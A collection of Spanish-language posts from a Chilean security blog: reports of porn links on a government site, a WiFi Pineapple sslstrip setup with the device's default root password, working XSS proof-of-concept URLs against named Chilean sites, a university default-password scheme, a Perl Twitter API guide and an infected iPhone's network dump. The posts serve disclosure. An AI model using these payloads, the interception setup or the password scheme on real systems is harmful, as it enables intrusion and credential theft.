[7ma Vez] Página de la JUNJI con links de Porno

De la SAGA: Hey Junji !
Presentamos por 7ta vez : Junji tienes links de Pornografía!

7ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.

Robo de información? Robo de clicks?

Timeline:

Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html
Cuarta denuncia: (abril-2013):  http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html 
Quinta denuncia (junio-2013): http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html 
Sexta Denuncia (Agosto-2013): http://blog.xshinee.cl/2013/08/6ta-vez-pagina-de-la-junji-con-links-de.html


Links Actuales :

Wifi Pineapple : WiFi Relay + iPhone

La piña WiFi te ofrece distintas formas de proveerle internet: ya sea por BAM, Ethernet con el PC, Android Usb Tethering, etc. En fin la situación era que soy dueño de un Iphone [Si, me gustan] y tengo mi plan ilimitado de Internet por lo que no quería pagar una BAM solo para la Piña y la idea no era andar con el PC en todas partes. Busqué por un montón de sitios opciones que me permitieran conectar la piña al Iphone por usb y realizar un tethering pero no era soportado debido a ciertos paquetes ausentes.

Entonces hay que aprovechar lo que tenemos:

PiñaWifi | WifiPineaple MK4

Iphone 4 

Adaptador USB wifi | Crolatus 

Un Hub Ordinario xD

Memoria Usb [Para las Infusiones]

Conectamos mediante el Hub, el usb con nuestras infusiones y el Adaptador USB WiFi Crolatus y verificamos que lo reconozca mediante la pestaña usb accediendo por el navegador http://172.16.42.1:1471

La idea es alimentar a la Piña mediante compartir Internet inalambrico desde el iPhone y hacer correr sslstrip | Todo esto si mediar la necesidad de un computador.

Archivos de Conexión:

Nuestro connect1.sh

#!/bin/sh


ifconfig wlan1 up


# Conexión a WPA2 usando wpa_supplicant 
 
wpa_supplicant -i wlan1 -c clave1 -B
# "clave1" será un archivo creado por nosotros
#wlan1 es nuestro Adaptador Crolatus 


#ipforwarding 
echo 1 > /proc/sys/net/ipv4/ip_forward

#Reset de iptables and config
iptables -F
iptables -X

iptables -A FORWARD -o wlan1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE

#un sleep de 6 segundos para que este lista la asociación..
sleep 6

# DHCP de OpenWrt
udhcpc -i wlan1

Ahora seguiremos con el archivo "clave1" mencionado en el script anterior que se trata en de nuestro wpa_passphrase, abrimos una consola y escribimos:

wpa_passphrase tu_SSID tu_clave 
#En mi caso wpa_passphrase "iPhone de Shine" "00000000" > clave1

#Si vamos al archivo veremos algo asi
# network={
# ssid="iPhone de Shine"
# #psk="00000000"
# psk=0d6f2eaab4ddeef7e6a6bbb0118774b279fa81ad0839e92a888ad528a95106e7
#}

Subiremos los archivos "connect1.sh" y "clave1" a la piña por ssh al directorio /pineapple/config/ 

Entraremos a la piña por el navegador http://172.16.42.1:1471 y entraremos a la configuración para setear el uso del boton WPS para que ejecute el script cuando presiones dicho boton entre 2-4 segundos.

Ahora solo nos quedaría configurar el sslstrip para que se ejecute desde un comienzo al encender la Piña, existen otras formas de lanzarlo solo use su imaginación.

Listo, ya tenemos nuestra Piña lista para usada con el Internet del Iphone y lanzar el script con el boton WPS..

Upgradeando la Piña WiFi MK4 y no morir en el Intento

Estos días que ando con un "poco" más de tiempo, quise upgradear el firmware de la Piña y me di cuenta que mediante la plataforma el navegador arrojaba distintos problemas.

1) Decía descargar la versión 2.8.1 y realmente descargaba la 3.0.0 por lo que el MD5 no coincidía con el que te ofrece para comparar.

2) Al intentar usar el MD5 disponible directo del sitio (MK4)

arrojaba un error "Error, please check the file you specified. Error 7"

Buscando soluciones por las webs oficiales, di con la solución al Upgrade [ Sí, bendito ssh ]:

Nos conectamos a la piña por ssh:

ssh root@172.16.42.1
Password: pineapplesareyummy

Una vez dentro primero tendremos que generar un poco de espacio, ya que sino no podremos subir el firmware por scp a la piña. Entonces ejecutamos:

mtd -r erase rootfs_data

Luego de esto subimos por scp el fichero de Upgrade que descargamos desde la pagina oficial al directorio /tmp de la piña. así:

scp upgrade-2.8.1.bin root@172.16.42.1:/tmp/

Una vez dentro nuevamente de la piña por ssh, vamos a verificar el md5 del archivo haciendo un:

md5sum /tmp/upgrade-2.8.1.bin

Si correspondiera a la correcta, en este caso a:    17e4384a79e7fef9c267f7da34ed4743  Seguimos con el siguiente comando:

sysupgrade -n /tmp/upgrade-2.8.1.bin

Ahora solo queda hacer un reboot y listo !

Ahora a seguir instalando Infusions..

G0!

[XSF-XSS] Cross Site Flashing - Sitios Chilenos

Buscando sitios chilenos que tuvieran presente JW Player y revisando si la versión era vulnerable, o habia sido actualizada o fixeada para  Cross site Flashing | XSS , gracias a un pequeño script en perl y a Google di con unos sitios los cuales se ven afectados por esta vulnerabilidad.

Lista de sitios Chilenos Afectados:

TOP 8 || GOB y sitios conocidos

http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29 

http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29 

http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 

http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

[6ta vez] Página de la JUNJI con links de Porno

De la SAGA: Hey Junji !
Presentamos por 5ta vez : Junji tienes links de Pornografía!

Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.

Timeline:

Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html
Cuarta denuncia: (abril-2013):  http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html 
Quinta denuncia (junio-2013): http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html 

Links Porno en Source de dellibertador .gob .cl

Como se ha repetido últimamente en algunos sitios del Gobierno, han aparecido links a sitios pornos en el source del sitio dellibertador.gob.cl, muchas veces que no se ven reflejados en el sitio en si [display:none etc ], pero que buscan secuestrar tus clicks frecuentemente.

Aqui un SS del Source:

// Reportado.

[5ta vez] Página de la JUNJI con links de Porno

De la SAGA: Hey Junji !
Presentamos por 5ta vez : Junji tienes links de Pornografía!

Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.

Timeline:

Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html
Cuarta denuncia: (abril-2013):  http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html


La imagen para esta 5ta Vez:

Migrando Módulo Net::Twitter hacia API Twitter v1.1

Para quienes usamos Perl día a día para simplificar algunas tareas y automatizar un poco, es que va destinado esta entrada sobre el Modulo de Net::Twitter y su migración desde la API de Twitter v1 hacia la v1.1

Muchas veces usamos perl para programar bots que repitan mensajes aleatorios, o algo tan simple como twittear desde la linea de comando de forma rápida o hasta para monitorizar a distancia.

En fin muchos se habrán dado cuenta que sus codes asociados a la API de twitter a dejado de funcionar debido al cambio de API a la versión 1.1

Aquí dejo los pasos para migrar de forma exitosa y volver a tener rodando nuestros queridos codigos.




SYNOPSIS

use Net::Twitter
 
my $nt = Net::Twitter->new(
    traits              => [qw/API::RESTv1_1/],
    consumer_key        => $consumer_key,
    consumer_secret     => $consumer_secret,
    access_token        => $access_token,
    access_token_secret => $access_token_secret,
);

DESCRIPCION

Net :: Twitter antes de la versión 4.0 utiliza la API de Twitter de la versión 1. Ahora el API de Twitter v1.1 introdujo cambios que no son completamente compatibles hacia atrás, lo que requiere algunos cambios en el código de llamada.
Net::Twitter intenta siempre que la compatibilidad con versiones anteriores sea posible. En este documento se explica los cambios necesarios que debemos aplicar en el codigo de la nuestra aplicación para que pueda funcionar el Modulo Net::Twitter con la API de twitter version 1.1.


LO PRIMERO

Incluir API::RESTv1_1


Cada vez que creamos objeto en Net::Twitter llamando un new , debemos reemplazar  API::REST y dejarlo como API::RESTv1_1  . Para la mayoria de las aplicaciones esto es todo lo necesario.

EXCEPCIONES

La característica  Ratelimit es incompatible con el API::RESTv1_1

La caracteristica Ratelimit es incompatible con el API::RESTv1_1 . Rate limiting es uno de los cambios mas grandes en la versión 1.1.  En la v1 habia dos tipos de rate limit, uno para direcciones IP para llamadas no autenticadas y otro para usuario/aplicación para llamadas autenticadas. En la versiones 1.1 cada llamada debe estar autenticada y cada endpoint de la API ( i.e: Cada metodo ) tiene su rate limit. Los nuevos rate limits operan en una ventana de 1 hora.

Si tu codigo actualmente utiliza RateLimit tendrás que escribir código personalizado proporcionar una funcionalidad equivalente.


rate_limits_status

El valor de retorno para rate_limits_status es totalmente diferente. Consulte la documentación de la API de Twitter rate_limit_status para más detalles.

blocking

blocking_ids

friends

followers

Con API v1.1, estos métodos utilizan  cursor. Si usted no pasa un parámetro cursor, Twitter asume cursor => -1>. 

EL código existente que espera un valor de retorno arrayref debe ser modificado para esperar uno hashref y eliminar la referencia del slot users.

# With API v1
my $r = $nt->friends;
my @friends = @$r;
 
# With API v1.1
my $r = $nt->friends;
my @friends = @{$r->{users}};

Search

El método de búsqueda y el valor de retorno son sustancialmente diferentes entre Twitter API v1 y v1.1. En v1, búsqueda fue proporcionada por la característica API::Search . En v1.1, search se incluye en la característica API::RESTv1_1.

En primer lugar, debemos eliminar API::Search de sus llamadas a new. La caracteristica API::Search es incompatible con la API::RESTv1_1.

En v1, Twitter ha devuelto un hashref con varias teclas que contienen los metadatos. El conjunto actual de resultados se encuentra en el slot results:

# With Twitter API v1
my $nt = Net::Twitter->new(traits => [qw/API::REST API::Search/]);
 
my $r = $nt->search('perl hacker');
for my $status ( @{$r->{results} ) {
    # process each status...
}

Version 1.1 devuelve un hash con 2 slots: search_metadata and statuses

# With Twitter API v1.1
my $nt = Net::Twitter->new(traits => [qw/API::RESTv1_1/], %oauth_credentials);
 
my $r = $nt->searh('perl hacker');
for my $status ( @{$r->{statuses} ) {
    # process each status...
}

Desplazamiento por los resultados de búsqueda funciona de forma diferente en v1.1. En v1, Twitter ofrece un parámetro page:

# With Twitter API v1
for ( my $page = 1; $page <= 10; ++$page ) {
    my $r = $nt->search({ q => $query, page => $page, rpp => 100 });
    last unless @{$r->{results}};
 
    # process a page of results...
}

En la v1.1, se usa  max_id y count para obtener los resultados:

# With Twitter API v1.1
for ( my %args = ( q => $query, count => 100 ), my $n = 0; $n < 1000; ) {
    my $r = $nt->search({ %$args });
    last unless @{$r->{statuses}};
 
    $args{max_id} = $r->{statuses}[-1]{id} - 1;
    $n += @{$r->{statuses}};
 
    # process a page of results...
}

METODOS DESAPOBRADOS

algunos metodos de la API v1 de Twitter no estan disponibles para la v1.1:

friends_timeline

usar home_timeline en cambio

friendship_exists

relationship_exists

follows

friendship_exists y sus alias no están soportados en API v1.1. Debes usar show_friendship en cambio:

my $r = $nt->show_relationship({
    source_screen_name => $user_a,
    target_screen_name => $user_b,
});
if ( $r->{relationship}{source}{following} ) {
    # $user_a follows $user_b
}

//FIN

## Twitter for all 
## Fuente original

Claves por Default en el 2013?

Claves por default no es algo nuevo, la verdad es una de las formas más básicas de inseguridad en todos los tiempos. Entra entrada está motivada por la presencia de estas malas prácticas aun en el 2013 y donde sus consecuencias están subestimadas.

Podemos encontrar este problemas en distintas situaciones como:

• Modems / Routers
• WiFi ISP
• Passwords asociados a Jailbreak en IOS ( Alpine )
• Cuentas personales en Intranet / colegios y Universidades.
• Claves de acceso físico
• y más.

Password en la Universidad .. ?

*~ Conversando por ahí me di cuenta que algo que sucedía en algunas universidades es algo totalmente común para algunos. Algo preocupante porque mientras mas común es para la gente, mas se pueden aprovechar de estás fallas por lo que habrían mas víctimas.

Al entrar a la universidad generalmente se nos asigna una cuenta generalmente del tipo : 

PrimerySegundoNombre.Apellido@Universidad.Dominio

Si el RUT es: 12.345.678-9  / claveDefault: 5678

              12.345.678-9  / claveDefault: 6789

Usos del Password..?

Los passwords en la universidad estan diseñados para:

• ingresar al Intranet desde la web
• acceder a tu información
• ver horarios
• estados de pago
• Tomar asignaturas y sus horarios.
• Imprimir en el Lab de Computación a tu Saldo Mensual. $$
• Ingresar al uso de pcs en el Lab de Computación.
• Acceso a tu cuenta de correo educacional

Malas Prácticas..?

Es curioso darse cuenta que la mayoría de los alumnos no cambian su clave por default, muchos nisiquiera imaginan las cosas que se podrían lograr accediendo. ( no extrapolan el peligro ).

Mas curioso aún, a finales de cada año ciertas universidades realizan un Reseteo de las claves, por lo que cada año comienzas con tu misma clave por default. / y en el olvido queda tu clave actualizada que hayas cambiado previamente.

Fin~#

[4ta vez] Pagina de la JUNJI con links Pornos

Lo que sucede con el sitio de la JUNJI parece un cuento de nunca acabar, ya lo advertimos antes:

Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html
Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/
Tercera denuncia: ( Enero-2013) http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html

Ahora por Cuarta vez: ( Abril-2013) nuevamente a la luz:

Al parecer el encargado del sitio solo se limita a eliminar los links porno, y no a solucionar el verdadero problema.

//

Informacion Expuesta ? - Sitio Almacenes Paris

Lo que para algunos resulta ser algo muy común o una característica  para otros resulta ser una situación de información expuesta demás. Es común ver distintas maneras de recuperar una contraseña perdida. Preguntas secretas, envío al correo de un link para restablecer contraseña y otros.

La verdad el otro día me encontraba en la pagina de la Multitienda París intentando comprar algunos productos y había olvidado la contraseña, si #Genius . Por lo que fui a "¿Olvidaste tu clave? y comenzó la historia.

Al momento de dirigirnos a este sitio, observamos que en primero lugar nos pide el rut.

¿Efectividad del filtro SafeSearch? - Google Imagen

Todos sabemos que cualquier filtro en Internet no es 100% efectivo, pero cuando este efectividad se ve afectada por situaciones simples o que pueden realmente llegar a afectar a un menos resultan ser mucho mas preocupantes. Esta publicación tiene como objetivo encontrar ciertas palabras o frases que hagan fallar el filtro estricto y finalmente muestren imágenes con contenido inadecuado para esta configuración y/o un menor.


Primero: Configuraremos el filtro como Estricto.

Mi Iphone Infectado

Al comenzar esta entrada debo admitir que jamás imaginé tener infectado mi Iphone, algunos comportamientos me lo pudieron hacer sospechar sin embargo pensé que la fuente de los problemas podían ser otros.

Aclaración: Esta publicación esta basada en este post de Security by Default , debido a que en ella explican muy bien los conceptos he citado textualmente el texto original, aplicándolo a mi propia infección. 

Para empezar debo especificar que tengo un Iphone 3gs con firmware iOS 5.1.1 con Jailbreak, ademas gracias a Cydia tiene instalado Openssh para asi poder acceder más rapido cuando sea necesario. Aquí es donde comenzo el problema y los primeros sintomas con este error al intentar acceder por ssh a mi dispositivo:

shinee@Wafles:~$ ssh root@192.168.2.4
ssh_exchange_identification: Connection closed by remote host

Para entrar nuevamente ( temporalmente ) reinstalo Openssh desde Cydia, y me conecto al dispositivo y realizo un netstat:

iPhone:~ root# netstat
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  192.168.2.2.50075      186-40-121-209.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50074      186-40-121-208.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50073      186-40-121-207.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50072      186-40-121-206.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50071      186-40-121-205.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50070      186-40-121-204.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50069      186-40-121-203.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.50068      186-40-121-202.b.ssh   SYN_SENT
tcp4       0      0  192.168.2.2.ssh        192.168.2.4.32949      ESTABLISHED

La conexión established es aquella por la que yo estoy ya conectado al Iphone, pero todas las demás en estado SYN_SENT indican que estoy intentando conectarme al servidor SSH de otras IPs.

Mirando en /root/.ssh /known_hosts veo que "me he conectado previamente" a los siguientes hosts:

iPhone:~ root# cat .ssh/known_hosts
|1|IM5/6AJJZRC/jXby9zuH3+JomNg=|ZEbDVh4Tnkm22BmjKNfSxCuqkj0= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3IZi+wPcEGhYIgakZz6BqdSz2S/WQT8XsjNlj6GyVEUNAaw/K5sbi+rQua0SjJa4LMEV51bWuqoLnWnBXp4ryfGoNp3AXS7Ct2g6WWwSFvNhk8bcYu9lVOdWXa4b1irCOrMiS7c8wPBm3J6ZpuejrMEu60W1MBSgfpn01Rn2r5VVcMcuTR9Xozx0om3WLCd4Sj9t8+26u4SBCjsdRI6vtt/VXL7UO9J3ZzUQHxz/xSZP9qPjIM5ZfgQhAEtnpaWHt7sc4FseI52EHgweTzBqzueBT4u9ZZz0ypDEV8UzT/wBKX3GtT0Zk5514iDdYvvJ7NdLrY8DdalalP1zjVa7J
|1|62LADsxkMzPd95J8vQmr6WG4ebE=|k23QnHHzWTnfC1BoIdCMb8/1OLE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKkDCeuGRxySx/Fsibzl2CHpzPor6kKjIukD5H9U4Pa2s/OzrWmEE0Zfpv7vmeh4P65GcYYwr+0gMGHYl5Copo5osGZpUWSCcgqXhmMDicO11/jR9BQ1IT+okQclW9834PpOdUUJcrV1xUGmUM65MWHMA4tdBxQy2LaVwQfr8Uj7X3zg06ZpJ5FNflh8xEy1+/89PQY+Aqf95dCGOr/q4wB86EyVOWsyq0lELJLUXunpFOetHJVgq142l410mzY0zcIThE++QaW0qcwpkmeZdAWdZ3U59H20bVo7dw25c9f3fQterCkzbEKc06LVwml/rsEEntGYp3XT0MXsxaWqrd
|1|U9AXtD5Cb5YSmqzU+QG9syrumN0=|AjLAw2si99bIUAZco9+jUMQcOUo= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChuwhkoRDujqRfSnw3xVhVApCvViTVGQaP5AregOt9WZDkuxl7DqjE3AwUqIBAu3BNvNl1pVMDPO4OA0r2iNnAlAgdGvWznxR+f3o9kMdDdsNj2dkyYAsuvxjiADVWyIPWBMCBxk2ppIfozo1RNY2R5yD7J132P3fy3mfZl2IltRPl0rE1yyOv33yF2FzyC62qUt/3ZkmTK2xjXIjTMiZ7ioGSVGi5sSrCB5UkXBOFlnrGYOdKGvKgATohLhnkODg0AnU/ix+5zO1T5LEVEkosu0OrKYbGfDxpzFZ8iiDOr6DPcZDl3k9nYJ8Mgxp7P+9aENPkI2XcTFaH8FENcmIZ
|1|38E8/JaBSP1DLKQ1VCuJRpNgSzM=|kxqSGonPjkWr3q1NrIrNKp7nDYo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAurlUELJh8eMMkQ8y0Ia9ln2RP9TP6e0iiaPbObys+phn//XeSRKnGazL3s2TI4oijv+TLY8/IzbBsUUOaTwrj4C4Msfmo+Tn6aI52w9MXd0/SCUxDYBqLlvrY6XsEx6YoL/4sScq2k0R3IS80uGP8cwzt8ZoiqBzNr4YS9ejDoNLlDnsPtEMEgZ7W8bg8YXtxRiSHUX7fvdBfcpLAIylH8mDRwtvJDbT8urJB+WL+Df17BRwTApI5VovXHs/z3tbMlJqdD9ohktQdKD/twjDg74WWmlLjKCRBl43RM0FbbeTo6piSwOZVvLyhyhfHDzQBGSbQ5sZYQlA4Mc+SLOkHw==
|1|pDtkVHDZLvjMIHdxZlPM69CH9V8=|a2xKA83ZznLGcSqb3TSy/IISpDE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2WDs8rlYtEhGPzCjBcY8fDVX0uYHYfL4Hi1diPZQeVBiZ5EKV9KrqW7fosoeFIaQWGwb6j6wQriErmbS1BoGQNTMvMFljI1goZzrBH/LllEcHvwhsAU3FQP+yV+FrNnqINlXM97OboEG+/A6OaU6oeREaV2Yv4j8zsl9Zaz3+tyDBuiuxMlOIuiGWX51al/ukwC/rnwUK8Pm6yREC0+HA7T5KFPLgeHvYb57BltIGOz+h0VrEWsZ1gxpmDWfdcoutiWnGATaV8YgsvChgo04NIoJjYfza9UwbT1lFzf1/VZwcju3Q+6jPIxeD/Qt3C6h45nUFy/J9qR61QoFZU9eh
|1|4dHZvHCfcdigH/3Veb+pTpGoIlc=|DyG5SoPJLpbK0NybNU/8oMop8bs= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoigcWpGMIDXR+43NoVnP5cdWMKPXtZtI/jREYY3rII7VFJeKoFGnDREuz4jic9TeuajQgvP4NTv6R9OqpctQubKuRBuUALxC3wzIQ58x12rwkfgkvt0iT330pXwTOzrxDxR+uiOHT0sbOD9WWQVTOTxxUjfiFHLqm0LfYw3o1/obVZwF36TuE3l8FpRyrOqH73Blvg0VEbIFaLxzAmjdRC6KD95vZSQJWqQLD+xEBirKDDdNzqtQqB6cGmVP4kW/0onpBfxLd7Ef4g5H2hF343SfE4htmsfPKS0pBaB0BYiOLmkMcMpLZOWEU1dyEb1301SGK3A7zlMYix0nEl/+7
|1|QY5raMn+9bGBufyU+E8hbKO8vvU=|9pWEBfKQ+BO+zj5k0h3eMoh6E7E= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1CgdzFs6S1c2iZ5G0jaHYfZAhAheCJX8CBdIu5rEjBjhk4qo8Y4c7ubysZfjRrR000OekqakcBt6IoHgPSDHd6NP+ULPclpNAo2kppt7vVN/VqEEiixIfnuq9IfTN/lVStRFqLG/q+mijmRH0BGiOUbtxpiUs9jSfrOmpIV2GZpSgdN6D8Mi67Vo8yl6/tMeUcqCyeUvf+UbqOghywqMFOBmX7NerwomN3lJfIuYQZIIeHXtUs85fA+F0lTei1CHF1fRd1u6lX4FngE5W7FMnzB85tf94yo2soo6yTzJZe2t1NnfmsVdxcQebWzWVAZe2ejoII4m+vONRQ2xagvDIw==
|1|rMGl29QOTuSklPmn+lLhdWr/7VI=|06LXRtMURyzgeGGv6Ld3y8x32cM= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6TpZDoO+L+KJQJNdmTRLlCUttHqjtSmZQnX4R84sWh4xPQV1T18eY6kmLan/4rlD6d07zsuA5CPL3ZIzLG+aAyl+El8VNv07cmLLGJDIr1o3ES1M8I+X3EYdWmhU7laxlkG9C368X9ODq9h5U6LNlVxT0g9jfcYbYzKKM26Dz0RWpOnusld0yjavc49SdFlGCItO8TofEkUjWwLzTHiKuj8mrGE4rNE13fYRbCuO1GHpPmeyVgRlfyuwoByk85+C0z1eacxYrMzvE/TMVjuVxok6w/9m22p9nbxZ25t/+dEW1/4cphre3n7QRMYd8zp/gU7EwddYG82w/4P9sgCdZ
|1|x/TGLaOJewAaPMGmnrh5qS37EnA=|C1Xz6kPdSLq0BM0BBrvoPQsi6pU= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAtqTfzBhaVk1UG/TF+zotlk4IFoS7by/LfmJxjfot6O8WtcOZhZan3uZJyHg/KeFN17uhfij/+sdZyXGIk5Dsdc3pN1DfZ1/TekXsCEs6CGNHrFIhqdtwLLHdxF+hBr1hgPLm6onq1ZUJiOAAlDUqDQX7uXxXjRCxRuXcBduY4/52tuLGAdn8WDqZ3Uc/9TFGbZqqRtirX32YvvSONBuH8+ALI9NBoMK9z+siS2b8G6Gr0Sc37DjHHJaWauHKsucKtU4srz8K4fPPKt0KkG99RSKhFqCP+AX58C50YLOzU4cU5PiYWABZLTNhJ7TkaPKakZ+QcVB0j+R/koAfkOj5
|1|lefbEHSMLKN4q7PTTBtaucvl8ws=|mc1klabvJZOZTLf6ISg5u4VWR3o= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdkjHQ6kLA0rQu7U7iPeijwSC0u7vruEgGxlU7O0maL2laRsdXjtpfwRrnFjW/JMcWXgFy1gs+edXyhm4121hsOxWOGofIt1BnrObCEFjG4aQLvGdl0CVK/iYQDEZZ4SP8Qbn7V5BajSQqXpUzYsMcuqspe8yttbs/D/r33jmM/iBQe38LfrzeWgX9SV4zQVgoVSmzJDlR0vta0FLVqOolLNiTPLd078W7oKU1eGZL+A0KV2uxynocKMlZmwDyQ3IndQLoBbPnmxC1MpgYVE4EE85cu5DTOCMi/O1Szy4wNmsCmOhpFin6uIjelg6or1ZIcXQ6nXIhQfmxeGqSOyub
|1|gfCuSf/cCAcOO/ZasMpoU9IsKfA=|Fw6xcqJvrd/U+q9UXOBDjOIMMmc= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChfqaBH5U+ujylJztHkYurA9eCUjiTdg4qRF0P5wJfoJP3nQCCD6dIwc38FCWB2u8H1TxggdJmqxG18rpShSUb83vMqQGI7jK7G8t2iZpm8E0/Px2/m0MF2tSALd3NSIvZALt9hITTd28nLt3WwFMVTtSQdutinzgA5O6Bu76k82Ph59NimTalSF3VEYx3BVhfpIXwqmGW11V08zr7QvzXesE3dbpXUJ2CdUh3DGXO6ldeT4kgO5H3+wm8LS4AfhIbUSnHBjAy+5SproY/vnrtp21oNupKZ86yjA73yGBnk1DBIqCt0RkMGIJh7tthHLT8hZU3M7/s+Hs+zQQ3PY9p
|1|QqxlcaFS6fyesiEl7DXjnDtX2Vw=|EP4nZ5y0RlWUnPePu8GuIU0uHFg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDglJXorb4gFkyHkbNnqXPqU/8nycnES8LJxLXUosznhhxEj6vBIjJ3QiLTZQrtAWVwBMOsdfeRN1R5gVQ9z3pCLiVGsY8L1qofEzO9Oh/FtyzOS4YtPMe4WdJr8yxNYNSK3P0oWCNPfV1gniCTd6xrb5a7gXtpX44ggmHxBxF6N+jfFoCYosUXMXxxsotEfgifV0Wr71AJXIUHPHxYkYi0NRdav9W9gpG3NyDcHewxxZUcdTaOwaHLjxdOLTHLjjazXIeeQiv1y+/FvvWpofgFJkWUjU3rVkgEWeGl6BA4yPWg+pFDFcmKhOHC6adm5PmIK6sQG+YXSALpLsQ8G6E9
|1|nZj5dL69GL84PYdujmHGOucm5AA=|0mkAdlmvVSeCUQQGy9dGAmyVbwQ= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMVdWZ6MoI1NYW1Z753prTv2TBtetgLuHIAPdYJJC6Xw4X2N9eaXaNPqVwYuPK3W2gxV+XAzGuQC0rW2p3H00mFlBVd+tRFxL+r6xEIFqBC/Vnh4+dr3KgDPc+w0WgCV8jAWkG8YUpAaXy5BQD2PtFoP8beoEWBatRyTirFMi5d7//5VEbTbe2DbJLvFZiXUgeWf+cCbFp2GCj8zFtUvXNxu5SVEoSG87gWEMF5/u5lCGYzDeHNq/QRVMD8hCOpnQ7SCgPhSB2B0GXZqkMvOgDp7g7bvEp83FI0ohfyEo8wd/fYABBBgjUBGT5XKYWSa1T/8VC7vyes5Sjq+mzSPRT
|1|lYIRRtryumLw5Qqk2FV2AhcM7Ec=|p7Tf2n+0ywcRyFZXutZQ20XcmdA= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1UeyngQNEQNQ3IQAsPw8KKGykCE8w19LG+TvUudDlwGSH+B0KZTa/gz+n1Zezl2scuNkS9BSGVUdyCcMgBYyK5wB9VPgaoBKt0hd3m9gG6RBTjklv5ScwlowaVFfrO8RGRTjCXwNYUBJH+hoKzlbkQ+IaHqHo36UsCmwdhMeRmXxRze2IvRo4EQiTRvB0Dx7+syFmFReR5NO+1M/aTFOaN0US24LJ7qZ5UBBSxYIrJ6ihFE/XA1B2sWmnxoKVitYFXquCair6kQ2zKgbP2e/jE6Zm9UHSuH9jZUUA67As4aeWUrG5zf8Ct2xxhEw3L+1VWBWr0hC0TYMx4kxyhIHP
